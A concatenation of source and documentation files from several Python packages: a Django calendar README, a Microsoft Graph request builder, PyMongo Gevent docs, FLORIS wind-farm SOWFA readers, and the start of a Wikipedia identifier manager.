        # Column order below must match the order values are appended to tmp.
        headers = ["project", "experiment", "base_model", "origin", "best val acc", "test acc", "num test images", \
            "epochs", "base lr", "optimizer", "lr scheduler", "loss func", "All layers trained", "gpu used", "max gpu usage", "training time", "train dataset type", \
            "num train images", "num val images", "shuffled dataset", "train transforms", "val transforms", "test transforms"]
        for i in range(len(data)):
            tmp = [];
            tmp.append(str(data[i]["project_name"]));
            tmp.append(str(data[i]["experiment_name"]));
            # Use only the basename when the model name contains a path.
            model_name = data[i]["model"]["params"]["model_name"];
            if("/" in model_name):
                model_name = model_name.split("/")[-1];
            tmp.append(str(model_name));
            tmp.append(str(data[i]["origin"]));
            # Training may not have run; fill "NA" to keep columns aligned.
            if(data[i]["training"]["status"]):
                tmp.append(str(data[i]["training"]["outputs"]["best_val_acc"]));
            else:
                tmp.append("NA");
            # Testing fills two columns (accuracy + image count) or two "NA"s.
            if(data[i]["testing"]["status"]):
                tmp.append(str(data[i]["testing"]["percentage_accuracy"]));
                tmp.append(str(data[i]["testing"]["num_images"]));
            else:
                tmp.append("NA");
                tmp.append("NA");
            tmp.append(str(data[i]["hyper-parameters"]["num_epochs"]));
            tmp.append(str(data[i]["hyper-parameters"]["optimizer"]["params"]["lr"]));
            tmp.append(str(data[i]["hyper-parameters"]["optimizer"]["name"]));
            tmp.append(str(data[i]["hyper-parameters"]["learning_rate_scheduler"]["name"]));
            tmp.append(str(data[i]["hyper-parameters"]["loss"]["name"]));
            tmp.append(str(data[i]["model"]["params"]["freeze_base_network"]));
            tmp.append(str(data[i]["model"]["params"]["use_gpu"]));
            # Training time / GPU usage also depend on training having run.
            if(data[i]["training"]["status"]):
                tmp.append(str(data[i]["training"]["outputs"]["training_time"]));
                tmp.append(str(data[i]["training"]["outputs"]["max_gpu_usage"]));
            else:
                tmp.append("NA");
                tmp.append("NA");
            tmp.append(str(data[i]["dataset"]["dataset_type"]));
            tmp.append(str(data[i]["dataset"]["params"]["num_train_images"]));
            tmp.append(str(data[i]["dataset"]["params"]["num_val_images"]));
            tmp.append(str(data[i]["dataset"]["params"]["train_shuffle"]));
            tmp.append(str(data[i]["dataset"]["transforms"]["train"]));
            tmp.append(str(data[i]["dataset"]["transforms"]["val"]));
            tmp.append(str(data[i]["dataset"]["transforms"]["test"]));
            table.append(tmp);
        # Write the summary table out as comparison.csv (pd from wildcard
        # import of monk.system.imports).
        my_df = pd.DataFrame(table);
        fname = self.system_dict["master_comparison_dir_relative"] + "comparison.csv";
        my_df.to_csv(fname, index=False, header=headers);
        self.custom_print("Generated");
        self.custom_print("");
|
PypiClean
|
/psu_calendar-0.0.3.tar.gz/psu_calendar-0.0.3/README.md
|
# PSU Calendar
Provides a basic calendar view for your app
## Quick Start
### Dependencies
The following dependency is REQUIRED and must be installed in your app:
- [psu-base](https://pypi.org/project/psu-base/)
### Installation
```shell script
pip install psu-calendar
```
### Configuration
1. Configure [psu-base](https://pypi.org/project/psu-base/) in your Django app
1. Add `psu-calendar` to your `requirements.txt`
1. Add psu_calendar to your INSTALLED_APPS in `settings.py`:
```python
INSTALLED_APPS = [
...
'psu_base',
'psu_calendar',
]
```
## Usage
### In your view.py file
Start by getting the current month, or the month that the user has selected.
When the user selects the prev/next month, a redirect is required so that a page refresh does not
unexpectedly change the month again; this case is signaled by `get_month()` returning False.
```python
from psu_calendar.services import calendar_service
from django.shortcuts import render, redirect
def index(request):
month = calendar_service.get_month(request)
# False month indicates need for redirect (to prevent page refresh from changing month again)
if not month:
return redirect("my_calendar_view")
```
Day payloads can be set individually or in bulk. To set an individual day, use get_day() and set its properties as needed:
```python
day = month.get_day(15)
day.payload = '<whatever>'
day.heading = "Special Day!"
```
To set day content in bulk, provide a list of up to 31 payloads (list indices 0-30 correspond to days 1-31) or a dict keyed by day number, e.g. {1: payload, 2: payload, 31: payload}
You may also provide a dict including "heading" and/or "template" in addition to the "payload" for any given day (see day 13 below)
```python
sample_data = {
1: "First day of the month!",
2: {"heading": "Day TWO..."},
3: ["Red", "Orange", "Yellow", "Green", "Blue", "Purple"],
5: ("Hello", "World", "Tuple"),
8: list(range(1024, 1100)),
13: {"heading": "Big Day!", "payload": str(list(range(1024, 1100)))},
}
month.populate_days(sample_data)
```
### In your template.html files
The month object created in your view contains a `template_base_directory` property which defaults to `psu_calendar`.
If your project will contain multiple calendars, you may specify a different template base directory for one or more
of the calendars. Use the `template_base_directory` property to include the month.html template and render the calendar
view. Provide the month object as "month":
```
{%include month.month_template with month=month%}
```
If you have specified an alternate `template_base_directory`, you'll need to copy all 4 templates to the new path
(`month.html`, `nav_header.html`, `day.html`, and `style.css`).
If you're using the default `template_base_directory`, there is some basic formatting built in for when the day payload
is a list or tuple, but you'll probably want to override the `psu_calendar/day.html` template to handle your custom
day content.
## For Developers
The version number must be updated for every PyPi release.
The version number is in `psu_calendar/__init__.py`
### Document Changes
Record every change in [docs/CHANGELOG.txt](docs/CHANGELOG.txt)
### Publishing to PyPi
1. Create accounts on [PyPi](https://pypi.org/account/register/) and [Test PyPi](https://test.pypi.org/account/register/)
1. Create `~/.pypirc`
```
[distutils]
index-servers=
pypi
testpypi
[testpypi]
repository: https://test.pypi.org/legacy/
username: mikegostomski
password: pa$$w0rd
[pypi]
username: mikegostomski
password: pa$$w0rd
```
1. Ask an existing developer to add you as a collaborator - [test](https://test.pypi.org/manage/project/psu-calendar/collaboration/) and/or [prod](https://pypi.org/manage/project/psu-calendar/collaboration/)
1. `python setup.py sdist bdist_wheel --universal`
1. `twine upload --repository testpypi dist/*`
1. `twine upload dist/*`
1. Tag the release in Git. Don't forget to push the tag!
Example:
```shell script
git tag 0.1.2
git push origin 0.1.2
```
|
PypiClean
|
/msgraph_beta_sdk-1.0.0a9-py3-none-any.whl/msgraph/generated/users/item/employee_experience/learning_course_activities/item/learning_course_activity_item_request_builder.py
|
from __future__ import annotations
from dataclasses import dataclass
from kiota_abstractions.get_path_parameters import get_path_parameters
from kiota_abstractions.method import Method
from kiota_abstractions.request_adapter import RequestAdapter
from kiota_abstractions.request_information import RequestInformation
from kiota_abstractions.request_option import RequestOption
from kiota_abstractions.response_handler import ResponseHandler
from kiota_abstractions.serialization import Parsable, ParsableFactory
from typing import Any, Callable, Dict, List, Optional, TYPE_CHECKING, Union
if TYPE_CHECKING:
from ......models import learning_course_activity
from ......models.o_data_errors import o_data_error
# NOTE: Kiota-generated request builder -- edits should match the generator's
# conventions rather than hand-written style.
class LearningCourseActivityItemRequestBuilder():
    """
    Provides operations to manage the learningCourseActivities property of the microsoft.graph.employeeExperienceUser entity.
    """
    def __init__(self,request_adapter: RequestAdapter, path_parameters: Optional[Union[Dict[str, Any], str]] = None) -> None:
        """
        Instantiates a new LearningCourseActivityItemRequestBuilder and sets the default values.
        Args:
            pathParameters: The raw url or the Url template parameters for the request.
            requestAdapter: The request adapter to use to execute the requests.
        """
        if path_parameters is None:
            raise Exception("path_parameters cannot be undefined")
        if request_adapter is None:
            raise Exception("request_adapter cannot be undefined")
        # Url template to use to build the URL for the current request builder
        self.url_template: str = "{+baseurl}/users/{user%2Did}/employeeExperience/learningCourseActivities/{learningCourseActivity%2Did}{?%24select,%24expand}"

        url_tpl_params = get_path_parameters(path_parameters)
        self.path_parameters = url_tpl_params
        self.request_adapter = request_adapter

    async def get(self,request_configuration: Optional[LearningCourseActivityItemRequestBuilderGetRequestConfiguration] = None) -> Optional[learning_course_activity.LearningCourseActivity]:
        """
        Get learningCourseActivities from users
        Args:
            requestConfiguration: Configuration for the request such as headers, query parameters, and middleware options.
        Returns: Optional[learning_course_activity.LearningCourseActivity]
        """
        request_info = self.to_get_request_information(
            request_configuration
        )
        # Map 4XX/5XX responses onto the OData error type so the adapter can
        # raise typed exceptions.
        from ......models.o_data_errors import o_data_error

        error_mapping: Dict[str, ParsableFactory] = {
            "4XX": o_data_error.ODataError,
            "5XX": o_data_error.ODataError,
        }
        if not self.request_adapter:
            raise Exception("Http core is null")
        from ......models import learning_course_activity

        return await self.request_adapter.send_async(request_info, learning_course_activity.LearningCourseActivity, error_mapping)

    def to_get_request_information(self,request_configuration: Optional[LearningCourseActivityItemRequestBuilderGetRequestConfiguration] = None) -> RequestInformation:
        """
        Get learningCourseActivities from users
        Args:
            requestConfiguration: Configuration for the request such as headers, query parameters, and middleware options.
        Returns: RequestInformation
        """
        # Build the GET request from the URL template plus any caller-supplied
        # headers, query parameters, and middleware options.
        request_info = RequestInformation()
        request_info.url_template = self.url_template
        request_info.path_parameters = self.path_parameters
        request_info.http_method = Method.GET
        request_info.headers["Accept"] = ["application/json"]
        if request_configuration:
            request_info.add_request_headers(request_configuration.headers)
            request_info.set_query_string_parameters_from_raw_object(request_configuration.query_parameters)
            request_info.add_request_options(request_configuration.options)
        return request_info

    @dataclass
    class LearningCourseActivityItemRequestBuilderGetQueryParameters():
        """
        Get learningCourseActivities from users
        """
        def get_query_parameter(self,original_name: Optional[str] = None) -> str:
            """
            Maps the query parameters names to their encoded names for the URI template parsing.
            Args:
                originalName: The original query parameter name in the class.
            Returns: str
            """
            if original_name is None:
                raise Exception("original_name cannot be undefined")
            if original_name == "expand":
                return "%24expand"
            if original_name == "select":
                return "%24select"
            return original_name

        # Expand related entities
        expand: Optional[List[str]] = None

        # Select properties to be returned
        select: Optional[List[str]] = None

    @dataclass
    class LearningCourseActivityItemRequestBuilderGetRequestConfiguration():
        """
        Configuration for the request such as headers, query parameters, and middleware options.
        """
        # Request headers
        headers: Optional[Dict[str, Union[str, List[str]]]] = None

        # Request options
        options: Optional[List[RequestOption]] = None

        # Request query parameters
        query_parameters: Optional[LearningCourseActivityItemRequestBuilder.LearningCourseActivityItemRequestBuilderGetQueryParameters] = None
|
PypiClean
|
/oneline-0.6.4-alpha.tar.gz/oneline-0.6.4-alpha/js/lib/database/mongodb/doc/examples/gevent.rst
|
Gevent
======
PyMongo supports `Gevent <http://www.gevent.org/>`_. Simply call Gevent's
``monkey.patch_all()`` before loading any other modules:
.. doctest::
>>> # You must call patch_all() *before* importing any other modules
>>> from gevent import monkey; monkey.patch_all()
>>> from pymongo import MongoClient
>>> client = MongoClient()
PyMongo's Gevent support means
that :meth:`~pymongo.mongo_client.MongoClient.start_request()` ensures the
current greenlet (not merely the current thread) uses the same socket for all
operations until :meth:`~pymongo.mongo_client.MongoClient.end_request()` is called.
See the :doc:`requests documentation <requests>` for details on requests in
PyMongo.
Using Gevent With Threads
-------------------------
If you need to use standard Python threads in the same process as Gevent and
greenlets, run ``monkey.patch_socket()``, rather than
``monkey.patch_all()``, and create a
:class:`~pymongo.mongo_client.MongoClient` with ``use_greenlets=True``.
The :class:`~pymongo.mongo_client.MongoClient` will use a special greenlet-aware
connection pool.
.. doctest::
>>> from gevent import monkey; monkey.patch_socket()
>>> from pymongo import MongoClient
>>> client = MongoClient(use_greenlets=True)
An instance of :class:`~pymongo.mongo_replica_set_client.MongoReplicaSetClient`
created with ``use_greenlets=True`` will also use a greenlet-aware pool.
Additionally, it will use a background greenlet instead of a background thread
to monitor the state of the replica set.
.. doctest::
>>> from gevent import monkey; monkey.patch_socket()
>>> from pymongo.mongo_replica_set_client import MongoReplicaSetClient
>>> rsc = MongoReplicaSetClient(
... 'mongodb://localhost:27017,localhost:27018,localhost:27019',
... replicaSet='repl0', use_greenlets=True)
Setting ``use_greenlets`` is unnecessary under normal circumstances; simply call
``patch_all`` to use Gevent with PyMongo.
|
PypiClean
|
/FLORIS-3.4.1.tar.gz/FLORIS-3.4.1/floris/tools/sowfa_utilities.py
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
# See https://floris.readthedocs.io for documentation
import os
import re
import numpy as np
import pandas as pd
from ..logging_manager import LoggerBase
from ..utilities import Vec3
from .cut_plane import CutPlane, get_plane_from_flow_data
from .flow_data import FlowData
class SowfaInterface(LoggerBase):
"""
Object to facilitate interaction with flow data output by SOWFA.
Returns:
:py:class:`floris.tools.sowfa_utilities.SowfaInterface`: object
"""
def __init__(
self,
case_folder,
flow_data_sub_path="array_mean/array.mean0D_UAvg.vtk",
setup_sub_path="setUp",
turbine_array_sub_path="constant/turbineArrayProperties",
turbine_sub_path="constant/turbineProperties",
controlDict_sub_path="system/controlDict",
turbine_output_sub_path="turbineOutput/20000",
assumed_settling_time=None,
):
"""
SowfaInterface object init method.
Args:
case_folder (str): path to folder containing SOWFA data
flow_data_sub_path (str, optional): path to mean data.
Defaults to 'array_mean/array.mean0D_UAvg.vtk'.
setup_sub_path (str, optional): path to setup info.
Defaults to 'setUp'.
turbine_array_sub_path (str, optional): path to wind plant
info. Defaults to 'constant/turbineArrayProperties'.
turbine_sub_path (str, optional): path to wind turbine
info. Defaults to 'constant/turbineProperties'.
controlDict_sub_path (str, optional): path to turbine
controls info. Defaults to 'system/controlDict'.
turbine_output_sub_path (str, optional): path to turbine
operational data. Defaults to 'turbineOutput/20000'.
assumed_settling_time (float, optional): Time to account
for startup transients in simulation. Defaults to None.
"""
self.logger.info(case_folder)
# Save the case_folder and sub_paths
self.case_folder = case_folder
self.setup_sub_path = setup_sub_path
self.turbine_array_sub_path = turbine_array_sub_path
self.turbine_sub_path = turbine_sub_path
self.controlDict_sub_path = controlDict_sub_path
self.turbine_output_sub_path = turbine_output_sub_path
# Read in the input files
# Get control settings from sc input file
# TODO Assuming not dynamic and only one setting applied for each turbine
# TODO If not using the super controller sowfa variant, need alternative
# Get the turbine name and locations
turbine_array_dict = read_foam_file(
os.path.join(self.case_folder, self.turbine_array_sub_path)
)
self.turbine_name = turbine_array_dict["turbineType"].replace(
'"', ""
) # TODO Assuming only one type
self.layout_x, self.layout_y = get_turbine_locations(
os.path.join(self.case_folder, self.turbine_array_sub_path)
)
# Save the number of turbines
self.num_turbines = len(self.layout_x)
# if SC input exists, use it for yaw and pitch as it will over-ride
# if it does not exist, assume the values in turbineArray Properties
if os.path.exists(os.path.join(self.case_folder, "SC_INPUT.txt")):
df_SC = read_sc_input(self.case_folder)
self.yaw_angles = df_SC.yaw.values
self.pitch_angles = df_SC.pitch.values
else:
self.logger.info(
"No SC_INPUT.txt, getting pitch and yaw " + "from turbine array props"
)
self.yaw_angles = get_turbine_yaw_angles(
os.path.join(self.case_folder, self.turbine_array_sub_path)
)
self.pitch_angles = get_turbine_pitch_angles(
os.path.join(self.case_folder, self.turbine_array_sub_path)
)
self.logger.info(self.yaw_angles)
self.logger.info(self.pitch_angles)
# Get the turbine rotor diameter and hub height
turbine_dict = read_foam_file(
os.path.join(self.case_folder, self.turbine_sub_path, self.turbine_name)
)
self.D = 2 * turbine_dict["TipRad"]
# Use the setup file and control file to determine the precursor wind
# speed and the time flow averaging begins (settling time)
setup_dict = read_foam_file(os.path.join(self.case_folder, self.setup_sub_path))
controlDict_dict = read_foam_file(
os.path.join(self.case_folder, self.controlDict_sub_path)
)
start_run_time = controlDict_dict["startTime"]
averaging_start_time = setup_dict["meanStartTime"]
if assumed_settling_time is not None:
self.logger.info(
"Using assumed settling time of %.1f s" % assumed_settling_time
)
self.settling_time = assumed_settling_time
else:
self.settling_time = averaging_start_time - start_run_time
self.precursor_wind_speed = setup_dict["U0Mag"]
# Get the wind direction
self.precursor_wind_dir = setup_dict["dir"]
# Get the surface roughness
self.z0 = setup_dict["z0"]
# Read the outputs
self.turbine_output = read_sowfa_df(
os.path.join(self.case_folder, self.turbine_output_sub_path)
)
# Remove the settling time
self.turbine_output = self.turbine_output[
self.turbine_output.time > self.settling_time
]
# Get the sim_time
self.sim_time_length = self.turbine_output.time.max()
# Read the flow data
try:
self.flow_data = self.read_flow_frame_SOWFA(
os.path.join(case_folder, flow_data_sub_path)
)
# Re-set turbine positions to flow_field origin
self.layout_x = self.layout_x - self.flow_data.origin.x1
self.layout_y = self.layout_y - self.flow_data.origin.x2
except FileNotFoundError:
self.logger.info("No flow field found, setting NULL, origin at 0")
self.flow_data = None # TODO might need a null flow-field
# Try to work out the precursor directory
self.precursor_directory = "unknown"
try:
with open(os.path.join(case_folder, "runscript.preprocess"), "r") as fid:
raw = fid.readlines()
for i, line in enumerate(raw):
if "precursorDir=" in line:
self.precursor_directory = os.path.basename(
line.replace("precursorDir=", "")
)
except FileNotFoundError:
self.logger.info("No preprocess file found")
def __str__(self):
    """Emit a human-readable summary of the case through the case logger.

    The summary (case path, turbine info, control settings, inflow and
    timing info) is written via ``self.logger.info``; the method returns a
    single space so ``str(case)`` still yields a string.
    """
    summary = [
        "---------------------",
        "Case: %s" % self.case_folder,
        "==Turbine Info==",
        "Turbine: %s" % self.turbine_name,
        "Diameter: %dm" % self.D,
        "Num Turbines = %d" % self.num_turbines,
        "==Control Settings==",
        "Yaw Angles, [" + ", ".join(map(str, self.yaw_angles)) + "]",
        "Pitch Angles, [" + ", ".join(map(str, self.pitch_angles)) + "]",
        "==Inflow Info==",
        "U0Mag: %.2fm/s" % self.precursor_wind_speed,
        "dir: %.1f" % self.precursor_wind_dir,
        "==Timing Info==",
        "Settling time: %.1fs" % self.settling_time,
        "Simulation time: %.1fs" % self.sim_time_length,
        "---------------------",
    ]
    for message in summary:
        self.logger.info(message)
    return " "
def calculate_horizontal_plane(
    self, height, x_resolution=200, y_resolution=200, x_bounds=None, y_bounds=None
):
    """
    Get a horizontal (z-normal) cut-through plane at a specific height.

    Args:
        height (float): height of the cut plane in the flow-field frame.
        x_resolution (float, optional): output array resolution.
            Defaults to 200. NOTE(review): currently unused by this
            method -- the plane keeps the native flow-data resolution.
        y_resolution (float, optional): output array resolution.
            Defaults to 200. NOTE(review): currently unused.
        x_bounds (tuple, optional): limits of output array.
            Defaults to None. NOTE(review): currently unused.
        y_bounds (tuple, optional): limits of output array.
            Defaults to None. NOTE(review): currently unused.

    Returns:
        CutPlane: cut plane built from the extracted points.
    """
    # Extract the points lying on the z == height plane from the flow data
    df = get_plane_from_flow_data(
        self.flow_data, normal_vector="z", x3_value=height
    )
    # Compute and return the cutplane
    return CutPlane(df)
def calculate_cross_plane(
    self, x_loc, x_resolution=200, y_resolution=200, x_bounds=None, y_bounds=None
):
    """
    Get a vertical (x-normal) cut-through plane at a specific streamwise
    location. (The original docstring was copied from the horizontal-plane
    method; this one describes the actual behavior.)

    Args:
        x_loc (float): streamwise (x) location of the cut plane.
        x_resolution (float, optional): output array resolution.
            Defaults to 200. NOTE(review): currently unused by this
            method -- the plane keeps the native flow-data resolution.
        y_resolution (float, optional): output array resolution.
            Defaults to 200. NOTE(review): currently unused.
        x_bounds (tuple, optional): limits of output array.
            Defaults to None. NOTE(review): currently unused.
        y_bounds (tuple, optional): limits of output array.
            Defaults to None. NOTE(review): currently unused.

    Returns:
        CutPlane: cut plane built from the extracted points.
    """
    # Get the points of data in a dataframe on the x == x_loc plane
    df = get_plane_from_flow_data(self.flow_data, normal_vector="x", x3_value=x_loc)
    # Compute and return the cutplane
    return CutPlane(df)
def calculate_y_plane(
    self, y_loc, x_resolution=200, y_resolution=200, x_bounds=None, y_bounds=None
):
    """
    Get a vertical (y-normal) cut-through plane at a specific spanwise
    location. (The original docstring was copied from the horizontal-plane
    method; this one describes the actual behavior.)

    Args:
        y_loc (float): spanwise (y) location of the cut plane.
        x_resolution (float, optional): output array resolution.
            Defaults to 200. NOTE(review): currently unused by this
            method -- the plane keeps the native flow-data resolution.
        y_resolution (float, optional): output array resolution.
            Defaults to 200. NOTE(review): currently unused.
        x_bounds (tuple, optional): limits of output array.
            Defaults to None. NOTE(review): currently unused.
        y_bounds (tuple, optional): limits of output array.
            Defaults to None. NOTE(review): currently unused.

    Returns:
        CutPlane: cut plane built from the extracted points.
    """
    # Get the points of data in a dataframe on the y == y_loc plane
    df = get_plane_from_flow_data(self.flow_data, normal_vector="y", x3_value=y_loc)
    # Compute and return the cutplane
    return CutPlane(df)
def get_average_powers(self):
    """
    Return the time-averaged generator power of each turbine.

    Returns:
        np.ndarray: mean ``powerGenerator`` value per turbine, ordered by
        turbine number (0 .. num_turbines - 1).
    """
    means = [
        self.turbine_output[self.turbine_output.turbine == t].powerGenerator.mean()
        for t in range(self.num_turbines)
    ]
    return np.array(means)
def get_time_power_t(self, t):
    """
    Return the generator power time series of a specific turbine.

    Args:
        t (int): turbine number.

    Returns:
        pd.Series: ``powerGenerator`` samples for turbine ``t``.
    """
    is_turbine_t = self.turbine_output.turbine == t
    return self.turbine_output.loc[is_turbine_t, "powerGenerator"]
def get_average_thrust(self):
    """
    Return the time-averaged thrust of each turbine.

    Returns:
        np.ndarray: mean ``thrust`` value per turbine, ordered by turbine
        number (0 .. num_turbines - 1).
    """
    per_turbine = [
        self.turbine_output[self.turbine_output.turbine == t].thrust.mean()
        for t in range(self.num_turbines)
    ]
    return np.array(per_turbine)
def read_flow_frame_SOWFA(self, filename):
    """
    Read flow array output from SOWFA.

    Args:
        filename (str): name of file containing flow data.

    Returns:
        FlowData: container holding the x, y, z grid coordinates, the
        u, v, w velocity components, and the grid spacing, dimensions
        and origin parsed from the file header.

    NOTE(review): assumes the file header (first 10 lines) contains
    SPACING, DIMENSIONS and ORIGIN records; if any record is missing the
    corresponding local variable is unbound and this method raises --
    confirm upstream files always include all three.
    """
    # Read the grid metadata from the first 10 header lines of the file
    with open(filename, "r") as f:
        for _ in range(10):
            read_data = f.readline()
            if "SPACING" in read_data:
                splitstring = read_data.rstrip().split(" ")
                # Grid cell size along each axis
                spacing = Vec3(
                    float(splitstring[1]),
                    float(splitstring[2]),
                    float(splitstring[3]),
                )
            if "DIMENSIONS" in read_data:
                splitstring = read_data.rstrip().split(" ")
                # Number of grid points along each axis
                dimensions = Vec3(
                    int(splitstring[1]), int(splitstring[2]), int(splitstring[3])
                )
            if "ORIGIN" in read_data:
                splitstring = read_data.rstrip().split(" ")
                # Physical location of the grid's first point
                origin = Vec3(
                    float(splitstring[1]),
                    float(splitstring[2]),
                    float(splitstring[3]),
                )
    # Set up x, y, z as lists; a singleton axis collapses to [0.0]
    if dimensions.x1 > 1.0:
        xRange = np.arange(0, dimensions.x1 * spacing.x1, spacing.x1)
    else:
        xRange = np.array([0.0])
    if dimensions.x2 > 1.0:
        yRange = np.arange(0, dimensions.x2 * spacing.x2, spacing.x2)
    else:
        yRange = np.array([0.0])
    if dimensions.x3 > 1.0:
        zRange = np.arange(0, dimensions.x3 * spacing.x3, spacing.x3)
    else:
        zRange = np.array([0.0])
    # Cartesian product of the axis ranges with x varying fastest,
    # matching the row order of the velocity data on disk
    pts = np.array([(x, y, z) for z in zRange for y in yRange for x in xRange])
    # Velocity components, one tab-separated row per grid point,
    # starting after the 10 header lines
    df = pd.read_csv(
        filename, skiprows=10, sep="\t", header=None, names=["u", "v", "w"]
    )
    x = pts[:, 0]
    y = pts[:, 1]
    z = pts[:, 2]
    return FlowData(
        x, y, z, df.u.values, df.v.values, df.w.values, spacing, dimensions, origin
    )
def read_sc_input(case_folder, wind_direction=270.0):
    """
    Read the super controller (SC) input file to get the wind farm
    control settings.

    Args:
        case_folder (str): path to folder containing SC data
            (expects a whitespace-delimited ``SC_INPUT.txt`` inside).
        wind_direction (float, optional): Wind direction.
            Defaults to 270.

    Returns:
        df_SC (pd.DataFrame): dataframe containing SC info (columns
        ``time``, ``yaw``, ``pitch``), indexed by turbine number.
    """
    sc_file = os.path.join(case_folder, "SC_INPUT.txt")
    # sep=r"\s+" is the documented equivalent of delim_whitespace=True,
    # which was deprecated in pandas 2.2 and removed in pandas 3.0.
    df_SC = pd.read_csv(sc_file, sep=r"\s+")
    df_SC.columns = ["time", "turbine", "yaw", "pitch"]
    # Convert absolute nacelle heading to yaw offset relative to the wind
    df_SC["yaw"] = wind_direction - df_SC.yaw
    df_SC = df_SC.set_index("turbine")
    return df_SC
def read_sowfa_df(folder_name, channels=None):
    """
    Read SOWFA turbine output channels into a single pandas DataFrame.

    Args:
        folder_name (str): folder containing one output file per channel.
        channels (list, optional): specific channels to read. If None (or
            empty), a default set of simple scalar channels is read.
            NOTE: the default was changed from a mutable ``[]`` to None
            (same behavior, avoids the shared-mutable-default pitfall).

    Returns:
        pd.DataFrame: one row per (time, turbine) sample with one column
        per channel; time is shifted so the first sample is at t = 0.

    Raises:
        ValueError: if no readable channel files are found.
    """
    # All files present in the output folder
    outputNames = [
        f
        for f in os.listdir(folder_name)
        if os.path.isfile(os.path.join(folder_name, f))
    ]
    # Channels with the simple "turbine time dt value" row format;
    # blade-resolved outputs (Cl, Cd, alpha, ...) are not handled here.
    simpleFiles = [
        "nacYaw",
        "rotSpeedFiltered",
        "rotSpeed",
        "thrust",
        "torqueGen",
        "powerRotor",
        "powerGenerator",
        "torqueRotor",
        "azimuth",
        "pitch",
    ]
    # Limit to the requested channels (default: the simple set above)
    if not channels:
        outputNames = [o for o in outputNames if o in simpleFiles]
    else:
        outputNames = channels
    # Get the number of channels
    num_channels = len(outputNames)
    if num_channels == 0:
        raise ValueError("Is %s a data folder?" % folder_name)
    # Accumulate the channels, aligned on the (time, turbine) index
    df = None
    for chan in outputNames:
        filename = os.path.join(folder_name, chan)
        # Load the file (one header line, space-separated)
        df_inner = pd.read_csv(filename, sep=" ", header=None, skiprows=1)
        df_inner.columns = ["turbine", "time", "dt", chan]
        # Drop dt and index by (time, turbine) so channels merge cleanly
        df_inner = df_inner[["time", "turbine", chan]].set_index(["time", "turbine"])
        if df is None:
            # First channel: start the result frame from a copy
            df = df_inner.copy(deep=True)
        else:
            df[chan] = df_inner[chan]
    # Reset the index
    df = df.reset_index()
    # Zero the time axis
    df["time"] = df.time - df.time.min()
    return df
def read_foam_file(filename):
    """
    Read scalar and boolean/string inputs from an OpenFOAM input file.

    Args:
        filename (str): path to file to read.

    Returns:
        data (dict): dictionary with OpenFOAM inputs; values that parse
        as numbers are stored as floats, everything else as the raw
        string with the trailing ';' stripped. Lines inside the leading
        ``/* ... \\*----*/`` banner comment, ``//``/``#`` comment lines
        and blank lines are skipped.
    """
    data = {}
    with open(filename, "r") as fid:
        raw = fid.readlines()
    bloc_comment_test = False
    for i, line in enumerate(raw):
        if raw[i][0:2] == "/*":
            # Entering the OpenFOAM banner block comment
            bloc_comment_test = True
        if not bloc_comment_test:
            # Check if the string is a comment and skip line
            if raw[i].strip()[0:2] == "//" or raw[i].strip()[0:1] == "#":
                pass
            elif len(raw[i].strip()) == 0:  # Check if the string is empty and skip line
                pass
            else:
                tmp = raw[i].strip().rstrip().split()
                try:
                    # BUGFIX: np.float was removed in NumPy 1.20, which made
                    # this always raise and store numbers as strings via the
                    # fallback below; the builtin float parses identically.
                    data[tmp[0].replace('"', "")] = float(tmp[1][:-1])
                except Exception:
                    try:
                        # Non-numeric value: keep the raw string
                        data[tmp[0].replace('"', "")] = tmp[1][:-1]
                    except Exception:
                        # Keyword with no value token: skip it. (The
                        # original used the bare expression `next`, a no-op.)
                        pass
        if raw[i][0:2] == r"\*":
            # End of the banner block comment
            bloc_comment_test = False
    return data
def get_turbine_locations(turbine_array_file):
    """
    Extract wind turbine locations from SOWFA data.

    Args:
        turbine_array_file (str): path to file containing wind plant
            layout data.

    Returns:
        layout_x (np.array): wind plant layout coodinates (east-west).
        layout_y (np.array): wind plant layout coodinates (north-south).
    """
    coords = []
    with open(turbine_array_file, "r") as fh:
        for raw_line in fh:
            if "baseLocation" not in raw_line:
                continue
            # The first two numbers on the line are the x and y coordinates
            numbers = re.findall(r"[-+]?\d*\.\d+|\d+", raw_line)
            coords.append((float(numbers[0]), float(numbers[1])))
    layout_x = np.array([c[0] for c in coords])
    layout_y = np.array([c[1] for c in coords])
    return layout_x, layout_y
def get_turbine_pitch_angles(turbine_array_file):
    """
    Extract wind turbine blade pitch information from SOWFA data.

    Args:
        turbine_array_file (str): path to file containing pitch info.

    Returns:
        p (np.array): blade pitch info, one value per matching line.
    """
    with open(turbine_array_file, "r") as fh:
        # Take the first number found on every line mentioning "Pitch"
        pitches = [
            float(re.findall(r"[-+]?\d*\.\d+|\d+", raw_line)[0])
            for raw_line in fh
            if "Pitch" in raw_line
        ]
    return np.array(pitches)
def get_turbine_yaw_angles(turbine_array_file, wind_direction=270.0):
    """
    Extract wind turbine yaw angle information from SOWFA data.

    Args:
        turbine_array_file (str): path to file containing yaw info.
        wind_direction (float, optional): Wind direction.
            Defaults to 270.

    Returns:
        y (np.array): wind turbine yaw info, expressed as the offset of
        each nacelle heading from ``wind_direction``.
    """
    with open(turbine_array_file, "r") as fh:
        # First number on each "NacYaw" line is the nacelle heading
        yaws = [
            wind_direction - float(re.findall(r"[-+]?\d*\.\d+|\d+", raw_line)[0])
            for raw_line in fh
            if "NacYaw" in raw_line
        ]
    return np.array(yaws)
|
PypiClean
|
/oc_ds_converter-0.2.0-py3-none-any.whl/oc_ds_converter/oc_idmanager/wikipedia.py
|
from json import loads
from re import match, sub
from time import sleep
from urllib.parse import unquote
from oc_ds_converter.oc_idmanager.base import IdentifierManager
from requests import ReadTimeout, get
from requests.exceptions import ConnectionError
class WikipediaManager(IdentifierManager):
    """Identifier manager for Wikipedia identifiers (MediaWiki page IDs)."""

    def __init__(self, data={}, use_api_service=True):
        """Wikipedia manager constructor.

        Args:
            data: cache of validation results keyed by prefixed identifier.
                NOTE(review): mutable default argument -- all instances
                created without an explicit `data` share one dict; confirm
                this cross-instance cache sharing is intended.
            use_api_service: when False, `exists` skips the network check
                and returns False.
        """
        super(WikipediaManager, self).__init__()
        # MediaWiki Action API endpoint used by exists()
        self._api = "https://en.wikipedia.org/w/api.php/"
        self._use_api_service = use_api_service
        # Prefix prepended to normalised identifiers
